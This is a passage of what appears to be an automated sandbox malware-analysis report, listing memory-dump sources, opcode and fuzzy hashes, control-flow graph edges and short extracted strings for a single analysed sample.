                                                                                                                              • Instruction Fuzzy Hash: C412E731B1CA464BE758EB2C94A6275B3D2FF8A314F44457EE54EC32C6DE2CBC429681
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a7bb2214e99ebcaa8a3b9d9304ffac5c5b5616772d1be63db255e42526d4c457
                                                                                                                              • Instruction ID: b6bf88501be5b3e3bb880063567f65da25d64edc931eb0c7c4e439ec632f487d
                                                                                                                              • Opcode Fuzzy Hash: a7bb2214e99ebcaa8a3b9d9304ffac5c5b5616772d1be63db255e42526d4c457
                                                                                                                              • Instruction Fuzzy Hash: 64121521B1CA494FE7A5EB2C80A56BA77D1EF9A318B1401BDD18EC77D2DE1CBC429341
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e56da3d1f9bfc1fb5bf508f33e5bbf44e7968ad8437b08ac5f1e4ff457bd7831
                                                                                                                              • Instruction ID: 21a9002c77ad73c08dad81ed04643c47871e124873d7e8717d06c49f7be75f04
                                                                                                                              • Opcode Fuzzy Hash: e56da3d1f9bfc1fb5bf508f33e5bbf44e7968ad8437b08ac5f1e4ff457bd7831
                                                                                                                              • Instruction Fuzzy Hash: A002A571B08A4A8FDB99DF6C84A56B97BE1FF99310B54417ED00AC72D2DE3CA842D740
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 262da1217e81881309ab4484b51c9c89e11e0ffa0974a798274856944f8ce339
                                                                                                                              • Instruction ID: b775a90280dd9615ac7ad88cdcd9e1ecd8a824517118008fabfbf8c869999ef0
                                                                                                                              • Opcode Fuzzy Hash: 262da1217e81881309ab4484b51c9c89e11e0ffa0974a798274856944f8ce339
                                                                                                                              • Instruction Fuzzy Hash: D6F1F431A4EBCA5FE792977848A51E57FE0EF47220F4901FBC188CB493DA2D584AD742
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 99d06cbc6ea6212870e1fae88e864b114891f20beaf53c675f513b5d0020ea2c
                                                                                                                              • Instruction ID: ec4fa8c1c9f1d48faaefa9ee68dc091b9faf049b3dfaa3e0f27322d633968093
                                                                                                                              • Opcode Fuzzy Hash: 99d06cbc6ea6212870e1fae88e864b114891f20beaf53c675f513b5d0020ea2c
                                                                                                                              • Instruction Fuzzy Hash: 32D14931B0D6494FD7A8EB6C84A55B677E0FF86314B0802BAD58DC7293DE6CF8428791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ccd9ea5729f8be74f417832b3b0e3ae8159507dd4a88ec6b43a2a1e14bf70f17
                                                                                                                              • Instruction ID: bcb46be9f81f7f821796fba7186d88ed3929cf71e6d92341fa301cdf7c31bf5a
                                                                                                                              • Opcode Fuzzy Hash: ccd9ea5729f8be74f417832b3b0e3ae8159507dd4a88ec6b43a2a1e14bf70f17
                                                                                                                              • Instruction Fuzzy Hash: 41D11472B0DA864FD789DA7C94AA57477E1EF5632471401FFD08AC76E3EE2CA842C640
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b61f62074f06e33b0ff4c4cdc150ec069a3083c78401457f68dcaacb80c16741
                                                                                                                              • Instruction ID: 7385645488cdc216cfbd4d9671d8a528ccbf1728daadc19bf62380b582af8ac0
                                                                                                                              • Opcode Fuzzy Hash: b61f62074f06e33b0ff4c4cdc150ec069a3083c78401457f68dcaacb80c16741
                                                                                                                              • Instruction Fuzzy Hash: 9E51B462A0E7925FD7029B7C68A90E57FE0EF1732471911BBC588CB2A3ED5D5843A381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7942f26eb2c37939b4f243ad1d0754a6bd706e1438826b78e8eb5a2b188027bd
                                                                                                                              • Instruction ID: f8cf8d3f9646e2a94057f21c71b4175bcdfffab4ad8d5d4adb00a7abe3c7ba43
                                                                                                                              • Opcode Fuzzy Hash: 7942f26eb2c37939b4f243ad1d0754a6bd706e1438826b78e8eb5a2b188027bd
                                                                                                                              • Instruction Fuzzy Hash: 31D18331A08A498FDF95EF9CD4A5AE97BF1FF59304F2441A6D449D7286CB38E841CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2642096203.00007FFD34A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A40000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34a40000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ed489ac162dd4934fea0fd43393c7a9c93ca29df7337b0b34da292ab518cd929
                                                                                                                              • Instruction ID: 9b6e5e6b1e2dad4450ff9b08e8ffb7da661afbea6304db1be7f319413902a15f
                                                                                                                              • Opcode Fuzzy Hash: ed489ac162dd4934fea0fd43393c7a9c93ca29df7337b0b34da292ab518cd929
                                                                                                                              • Instruction Fuzzy Hash: B7910962B1DE4A0FE7A8E66C94A56B977D1EF99314B1401BFD14EC73C3DD18B8468380

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 144 7ffd34887ba6-7ffd34887bcb 145 7ffd34887bcd-7ffd34887c23 144->145 150 7ffd34887c25-7ffd34887c41 145->150 152 7ffd34888732-7ffd34888737 call 7ffd34886950 150->152 153 7ffd34887c47-7ffd34887cd6 150->153 158 7ffd3488873c-7ffd34888741 call 7ffd34886980 152->158 153->158 167 7ffd34887cdc-7ffd34887d6b 153->167 164 7ffd34888746-7ffd3488874b call 7ffd348869b0 158->164 171 7ffd34888750-7ffd34888755 call 7ffd348869e0 164->171 167->164 180 7ffd34887d71-7ffd34887d72 167->180 176 7ffd3488875a-7ffd3488875f call 7ffd34886a10 171->176 182 7ffd34888764-7ffd34888769 call 7ffd34886a40 176->182 181 7ffd34887d73-7ffd34887db0 180->181 185 7ffd34887db2-7ffd34887e00 181->185 189 7ffd3488876e-7ffd34888773 call 7ffd34886a70 182->189 185->171 194 7ffd34887e06-7ffd34887e5e 185->194 195 7ffd3488878c call 7ffd34886b00 189->195 200 7ffd34887e60-7ffd34887e95 194->200 198 7ffd34888791 195->198 201 7ffd34888796-7ffd348887b6 198->201 200->176 213 7ffd34887e9b-7ffd34887eb8 200->213 202 7ffd348887ed-7ffd348887fe 201->202 203 7ffd348887b9 call 7ffd34886b18 201->203 205 7ffd34888805-7ffd34888828 202->205 206 7ffd34888800 202->206 203->202 208 7ffd3488882a-7ffd34888871 205->208 209 7ffd348888a4-7ffd348888b5 205->209 206->205 211 7ffd348888b7 209->211 212 7ffd348888bc-7ffd348888f7 209->212 211->212 218 7ffd348888f9-7ffd34888943 212->218 219 7ffd34888973-7ffd34888984 212->219 213->200 220 7ffd34887eba-7ffd34887f2a 213->220 218->219 221 7ffd34888986 219->221 222 7ffd3488898b-7ffd348889c6 219->222 220->182 241 7ffd34887f30-7ffd34887fbf 220->241 221->222 229 7ffd348889c8-7ffd34888a38 222->229 230 7ffd34888a42-7ffd34888a53 222->230 229->230 231 7ffd34888a55 230->231 232 7ffd34888a5a-7ffd34888a95 230->232 231->232 238 7ffd34888a97-7ffd34888ae1 232->238 239 7ffd34888b11-7ffd34888b22 232->239 238->239 242 7ffd34888b29-7ffd34888b64 239->242 243 7ffd34888b24 239->243 241->189 267 7ffd34887fc5-7ffd3488809f 241->267 248 7ffd34888b66-7ffd34888bad 242->248 249 7ffd34888be0-7ffd34888bf1 242->249 243->242 248->249 252 7ffd34888bf8-7ffd34888c33 249->252 253 7ffd34888bf3 249->253 259 7ffd34888c35-7ffd34888ca5 252->259 260 7ffd34888caf-7ffd34888cc0 252->260 253->252 259->260 262 7ffd34888cc7-7ffd34888d08 260->262 263 7ffd34888cc2 260->263 270 7ffd34888d0a-7ffd34888d30 262->270 271 7ffd34888d84-7ffd34888d95 262->271 263->262 285 7ffd3488810e-7ffd3488812a 267->285 286 7ffd348880a1-7ffd348880e0 267->286 277 7ffd34888d31-7ffd34888d51 270->277 272 7ffd34888d97 271->272 273 7ffd34888d9c-7ffd34888ddd 271->273 272->273 281 7ffd34888e59-7ffd34888e6a 273->281 282 7ffd34888ddf-7ffd34888e27 273->282 277->271 283 7ffd34888e6c 281->283 284 7ffd34888e71-7ffd34888eb2 281->284 283->284 293 7ffd34888f2e-7ffd34888f3f 284->293 294 7ffd34888eb4-7ffd34888efb 284->294 288 7ffd34888132-7ffd34888162 285->288 296 7ffd348880f2-7ffd3488812a 286->296 297 7ffd348880e2-7ffd348880e9 286->297 308 7ffd34888164-7ffd3488817e 288->308 298 7ffd34888f46-7ffd34888f87 293->298 299 7ffd34888f41 293->299 294->293 296->288 301 7ffd348880ef-7ffd348880f0 297->301 302 7ffd34888782 call 7ffd34886ad0 297->302 311 7ffd34888f89-7ffd34888fd0 298->311 312 7ffd34889003-7ffd34889014 298->312 299->298 301->296 310 7ffd34888787 302->310 308->195 318 7ffd34888184-7ffd3488820a 308->318 310->308 313 7ffd3488b5d1-7ffd3488b5da 310->313 314 7ffd34889016 312->314 315 7ffd3488901b-7ffd3488905c 312->315 314->315 322 7ffd348890d8-7ffd348890e9 315->322 323 7ffd3488905e-7ffd348890a3 315->323 332 7ffd3488821c-7ffd34888229 318->332 333 7ffd3488820c-7ffd34888213 318->333 325 7ffd348890eb 322->325 326 7ffd348890f0-7ffd34889131 322->326 323->322 325->326 334 7ffd348891ad-7ffd348891be 326->334 335 7ffd34889133-7ffd348891a3 326->335 337 7ffd3488822b-7ffd3488827d 332->337 338 7ffd3488827f-7ffd34888543 call 7ffd348850b8 332->338 333->201 336 7ffd34888219-7ffd34888229 333->336 339 7ffd348891c5-7ffd34889206 334->339 340 7ffd348891c0 334->340 335->334 336->337 336->338 337->338 338->202 416 7ffd34888549-7ffd34888587 call 7ffd34886c28 338->416 348 7ffd34889208-7ffd3488924f 339->348 349 7ffd34889282-7ffd34889293 339->349 340->339 348->349 350 7ffd34889295 349->350 351 7ffd3488929a-7ffd348892de 349->351 350->351 359 7ffd3488935a-7ffd3488936b 351->359 360 7ffd348892e0-7ffd34889350 351->360 361 7ffd3488936d 359->361 362 7ffd34889372-7ffd348893b6 359->362 360->359 361->362 368 7ffd348893b8-7ffd34889428 362->368 369 7ffd34889432-7ffd34889443 362->369 368->369 370 7ffd34889445 369->370 371 7ffd3488944a-7ffd348894af 369->371 370->371 379 7ffd3488952a-7ffd34889539 371->379 380 7ffd348894b1-7ffd348894f8 371->380 383 7ffd3488953b-7ffd34889562 379->383 384 7ffd34889563-7ffd348895c4 379->384 380->379 383->384 416->313
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: h}w4$h}w4$h}w4$h}w4
                                                                                                                              • API String ID: 0-2619420978
                                                                                                                              • Opcode ID: 40dd4c7da0bdcb5183d04ab6fabbb8f443c8bd0576940178cc0950d9a58ba46b
                                                                                                                              • Instruction ID: ae7ec28c96ea8505554dbf40757359fe33cc731c7823b34c558da19be80e1ec6
                                                                                                                              • Opcode Fuzzy Hash: 40dd4c7da0bdcb5183d04ab6fabbb8f443c8bd0576940178cc0950d9a58ba46b
                                                                                                                              • Instruction Fuzzy Hash: C2F28134608A4E8FDB85EF58C8A4BEA77E1FF59310F1445B9E419D7296CA38F846CB40

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HAw4$HAw4$HAw4${'
                                                                                                                              • API String ID: 0-3394631271
                                                                                                                              • Opcode ID: 63a374d1ff7c321199d500e3b5317c9a236cc41cb5e97362d0bafc159217fe8f
                                                                                                                              • Instruction ID: f433259a7acfc020725a06426846550a8cdde57c35bb1b4dfb205d67c7488baf
                                                                                                                              • Opcode Fuzzy Hash: 63a374d1ff7c321199d500e3b5317c9a236cc41cb5e97362d0bafc159217fe8f
                                                                                                                              • Instruction Fuzzy Hash: AEA1FA72F1CA494FDBA5EB1CD8A56B9B7E1EF99310F00017AD44ED3282DE34AC469781

                                                                                                                              Control-flow Graph

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HAw4$HAw4$HAw4${'
                                                                                                                              • API String ID: 0-3394631271
                                                                                                                              • Opcode ID: cf312e00c62dc8289fe6767e0aba28ff1db51974a42716d9350c28d972de074a
                                                                                                                              • Instruction ID: 6b1d90b32f0e8b9a4132fd3becf8230d06f85ac397d06f16ab3618cd77ea6ee6
                                                                                                                              • Opcode Fuzzy Hash: cf312e00c62dc8289fe6767e0aba28ff1db51974a42716d9350c28d972de074a
                                                                                                                              • Instruction Fuzzy Hash: AD910B72F18A494FDBA5EB1CD8956BDB7E1EF99310F00017AD44ED3242DE34AC469781
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: h}w4
                                                                                                                              • API String ID: 0-3258310775
                                                                                                                              • Opcode ID: 641018f8024d7e0e40ccf97e15632ad19e333f3e18dce9fafa7c979b096c5831
                                                                                                                              • Instruction ID: 7253b7b98a0be41a5e5aab3daed7a0d133fc84b3697a4c9e137d2d5c98f38003
                                                                                                                              • Opcode Fuzzy Hash: 641018f8024d7e0e40ccf97e15632ad19e333f3e18dce9fafa7c979b096c5831
                                                                                                                              • Instruction Fuzzy Hash: 69F20F30608A8A8FDBC5EF68C4A5AE977E1FF59310F5805B9D45DCB296DA3DD842CB00

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1976 7ffd3489f060-7ffd3489f6e1 1978 7ffd3489f6e7-7ffd3489f6f5 1976->1978 1979 7ffd3489f6e3-7ffd3489f6e4 1976->1979 1981 7ffd3489f6f7-7ffd3489f70c 1978->1981 1982 7ffd3489f70e-7ffd3489f719 1978->1982 1979->1978 1981->1982 1985 7ffd3489f748 1982->1985 1986 7ffd3489f71b-7ffd3489f720 1982->1986 1987 7ffd3489fb06-7ffd3489fb15 1985->1987 1988 7ffd3489f74d-7ffd3489f754 1986->1988 1989 7ffd3489f722-7ffd3489f72b 1986->1989 1991 7ffd3489f756-7ffd3489f769 1988->1991 1992 7ffd3489f76b-7ffd3489f784 1988->1992 1989->1985 1991->1992 1996 7ffd3489f786-7ffd3489f79e 1992->1996 1997 7ffd3489f7e3-7ffd3489f7f5 1992->1997 2000 7ffd3489f7ba-7ffd3489f7bb 1996->2000 2001 7ffd3489f7a0-7ffd3489f7b8 1996->2001 2002 7ffd3489f7fb-7ffd3489f819 1997->2002 2003 7ffd3489f920-7ffd3489f932 1997->2003 2005 7ffd3489f7c2-7ffd3489f7cb 2000->2005 2001->2000 2015 7ffd3489f847-7ffd3489f84a 2002->2015 2016 7ffd3489f81b-7ffd3489f820 2002->2016 2011 7ffd3489f938-7ffd3489f950 2003->2011 2012 7ffd3489fae0-7ffd3489fae7 2003->2012 2008 7ffd3489f7de 2005->2008 2009 7ffd3489f7cd-7ffd3489f7d1 2005->2009 2008->1987 2009->2008 2013 7ffd3489f7d3-7ffd3489f7dc 2009->2013 2011->2012 2033 7ffd3489f956-7ffd3489f96b 2011->2033 2017 7ffd3489fae9-7ffd3489fafc 2012->2017 2018 7ffd3489fafe-7ffd3489fb04 2012->2018 2013->2008 2020 7ffd3489f84c-7ffd3489f862 2015->2020 2021 7ffd3489f864-7ffd3489f8c1 2015->2021 2016->2003 2019 7ffd3489f826-7ffd3489f83a 2016->2019 2017->2018 2018->1987 2031 7ffd3489fb16-7ffd3489fbb0 2019->2031 2032 7ffd3489f840-7ffd3489f845 2019->2032 2020->2021 2021->2003 2045 7ffd3489f8c3-7ffd3489f8db 2021->2045 2041 7ffd3489fbdb-7ffd3489fc41 2031->2041 2042 7ffd3489fbb2-7ffd3489fbd4 2031->2042 2032->2015 2033->2012 2052 7ffd3489fc8b-7ffd3489fc8e 2041->2052 2053 7ffd3489fc43-7ffd3489fc49 2041->2053 2042->2041 2049 7ffd3489f8f7-7ffd3489f908 2045->2049 2050 7ffd3489f8dd-7ffd3489f8f5 2045->2050 2059 7ffd3489f90a-7ffd3489f90e 2049->2059 2060 7ffd3489f91b 2049->2060 2050->2049 2056 7ffd3489fc93-7ffd3489fcf1 2052->2056 2055 7ffd3489fc4b-7ffd3489fc7d 2053->2055 2053->2056 2055->2052 2059->2060 2062 7ffd3489f910-7ffd3489f919 2059->2062 2060->1987 2062->2060
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: +Y_H$DN_H
                                                                                                                              • API String ID: 0-2235932479
                                                                                                                              • Opcode ID: 2d8121c4dce039339870610df8ec95ac468777e19653c5cbca5fdb0af269961a
                                                                                                                              • Instruction ID: 2d194614152c452808149203783085a860339ede377c136db3f6f08eb21f48ef
                                                                                                                              • Opcode Fuzzy Hash: 2d8121c4dce039339870610df8ec95ac468777e19653c5cbca5fdb0af269961a
                                                                                                                              • Instruction Fuzzy Hash: 60F1F92270DE8A5FD799EB6C98B56F57BD1EF56310B0800BBD24DCB1A3DD28AC459340

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2177 7ffd34880e28-7ffd34882ab8 call 7ffd348821f8 2181 7ffd34882aba-7ffd34882af0 call 7ffd34882228 2177->2181 2182 7ffd34882b07-7ffd34882b3f 2177->2182 2191 7ffd34882af5-7ffd34882af9 2181->2191 2188 7ffd34882b41-7ffd34882b59 2182->2188 2189 7ffd34882b97-7ffd34882c5b 2182->2189 2194 7ffd34882b60-7ffd34882b95 2188->2194 2205 7ffd34882c5d-7ffd34882c62 2189->2205 2206 7ffd34882c65-7ffd34882c6b 2189->2206 2191->2194 2195 7ffd34882afb-7ffd34882b06 2191->2195 2194->2189 2205->2206 2207 7ffd34882c6d-7ffd34882c72 2206->2207 2208 7ffd34882c75-7ffd34882c9e 2206->2208 2207->2208 2209 7ffd34882ca4-7ffd34882cb0 2208->2209 2210 7ffd34882cb2 2209->2210 2211 7ffd34882cb8-7ffd34882cd8 2209->2211 2210->2211
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HAw4$HAw4
                                                                                                                              • API String ID: 0-2317605305
                                                                                                                              • Opcode ID: 3eb5160e4e8ef567fa8ba181c8833ed7f76c83f7aec1b191b59918dd3058b637
                                                                                                                              • Instruction ID: 78437ca45261be25d89322987ecbcb1f07e6b02aa5f67e95d0390f5e7ff4dc87
                                                                                                                              • Opcode Fuzzy Hash: 3eb5160e4e8ef567fa8ba181c8833ed7f76c83f7aec1b191b59918dd3058b637
                                                                                                                              • Instruction Fuzzy Hash: FC71D531B08A494FD799DB6CD4656B9B7E1FFD9311F04427ED04ED3292DE68A8428780

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 3097 7ffd3488e6f5-7ffd3488e817 3111 7ffd3488e886-7ffd3488e897 3097->3111 3112 7ffd3488e819-7ffd3488e856 3097->3112 3113 7ffd3488e899 3111->3113 3114 7ffd3488e89e-7ffd3488e8ce 3111->3114 3112->3111 3113->3114 3118 7ffd3488ed17-7ffd3488ed41 3114->3118 3119 7ffd3488e8d4-7ffd3488e8e6 3114->3119 3125 7ffd3488edbb-7ffd3488edcc 3118->3125 3126 7ffd3488ed43-7ffd3488ed7d call 7ffd3488d088 3118->3126 3120 7ffd3488ecca 3119->3120 3121 7ffd3488e8ec-7ffd3488e91b 3119->3121 3128 7ffd3488eccf-7ffd3488ece8 3120->3128 3123 7ffd3488e91d-7ffd3488e942 3121->3123 3124 7ffd3488e96e-7ffd3488e9bd 3121->3124 3131 7ffd3488e948-7ffd3488e96c 3123->3131 3132 7ffd3488ed82-7ffd3488edb4 3123->3132 3135 7ffd3488ecee-7ffd3488ed11 3124->3135 3136 7ffd3488e9c3-7ffd3488e9d5 3124->3136 3133 7ffd3488edce-7ffd3488edd3 3125->3133 3134 7ffd3488edd4-7ffd3488ee20 3125->3134 3137 7ffd3488ee21-7ffd3488ee2a 3126->3137 3128->3135 3128->3136 3131->3124 3132->3125 3133->3134 3134->3137 3135->3118 3135->3119 3136->3120 3138 7ffd3488e9db-7ffd3488e9e7 3136->3138 3140 7ffd3488e9e9-7ffd3488ea15 call 7ffd34880418 3138->3140 3141 7ffd3488ea2b-7ffd3488ea2f 3138->3141 3156 7ffd3488ea1a-7ffd3488ea2a 3140->3156 3148 7ffd3488ea31-7ffd3488ea63 call 7ffd3488bb10 3141->3148 3149 7ffd3488ea64-7ffd3488ea68 3141->3149 3148->3149 3151 7ffd3488ea6a-7ffd3488ea8f 3149->3151 3152 7ffd3488eadf-7ffd3488eb01 3149->3152 3157 7ffd3488eb08-7ffd3488eb1b 3151->3157 3163 7ffd3488ea91-7ffd3488ead7 3151->3163 3152->3157 3156->3141 3160 7ffd3488eb59-7ffd3488ebb2 call 7ffd3488ee2b call 7ffd3488ee78 3157->3160 3161 7ffd3488eb1d-7ffd3488eb26 3157->3161 3160->3128 3179 7ffd3488ebb8-7ffd3488ec0a 3160->3179 3166 7ffd3488eb38-7ffd3488eb4f 3161->3166 3167 7ffd3488eb28-7ffd3488eb2e 3161->3167 3163->3152 3166->3160 3173 7ffd3488eb51-7ffd3488eb52 3166->3173 3167->3166 3173->3160 3184 7ffd3488ecc0-7ffd3488ecc8 call 7ffd3488eec5 3179->3184 3185 7ffd3488ec10-7ffd3488ec2f 3179->3185 3184->3128 3188 7ffd3488ec48-7ffd3488ec71 3185->3188 3189 7ffd3488ec31-7ffd3488ec3e 3185->3189 3196 7ffd3488eca2-7ffd3488ecba 3188->3196 3197 7ffd3488ec73-7ffd3488ec9b call 7ffd34885dd8 3188->3197 3189->3188 3192 7ffd3488ec40-7ffd3488ec46 3189->3192 3192->3188 3196->3184 3196->3185 3197->3196
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hcv4
                                                                                                                              • API String ID: 0-1839526002
                                                                                                                              • Opcode ID: 2b3c0b2fd3fd2b01937a5562c2d462a478cf6bef8096725bb5c4c27e93c52170
                                                                                                                              • Instruction ID: 9b7ed765797a96ed94591c897743d4ed9cf68c5871b05aa1c8619be3c9dc48e1
                                                                                                                              • Opcode Fuzzy Hash: 2b3c0b2fd3fd2b01937a5562c2d462a478cf6bef8096725bb5c4c27e93c52170
                                                                                                                              • Instruction Fuzzy Hash: 1E429231B18A4E8FDBD4EF18C4A5AB977E2FF99300B144569D41EC7296DA38EC42CB41
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: d
                                                                                                                              • API String ID: 0-2564639436
                                                                                                                              • Opcode ID: 549a139f4c80fae98055391b05fe311aadcca250b84ee97d5b3b5676397c92ec
                                                                                                                              • Instruction ID: 50b1edd771747875b1f1a4c9339ce5aa70987e530fec72a1c2a99c92897abc51
                                                                                                                              • Opcode Fuzzy Hash: 549a139f4c80fae98055391b05fe311aadcca250b84ee97d5b3b5676397c92ec
                                                                                                                              • Instruction Fuzzy Hash: D8F1AE30618B098FD768DB18D4956B6B3E1FF99311F10467ED18EC3696CE79B842CB81
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2635879106.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_apDMcnqqWs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: N_^D
                                                                                                                              • API String ID: 0-1759931596
                                                                                                                              • Opcode ID: ed750b64032bbae84e6f018c8181ea00b0ca906ef7c697161422e2392a254f37
                                                                                                                              • Instruction ID: 60b67371d287ee23e195f0fd9c8f84bc445f73e9e4919f41f4edad790decaaec
                                                                                                                              • Opcode Fuzzy Hash: ed750b64032bbae84e6f018c8181ea00b0ca906ef7c697161422e2392a254f37
                                                                                                                              • Instruction Fuzzy Hash: C8B11772B0DE8A0FDB59DBA848B55B577E1EF56314B0801BBD18DC7193DE6CAC428381
                                                                                                                              Strings
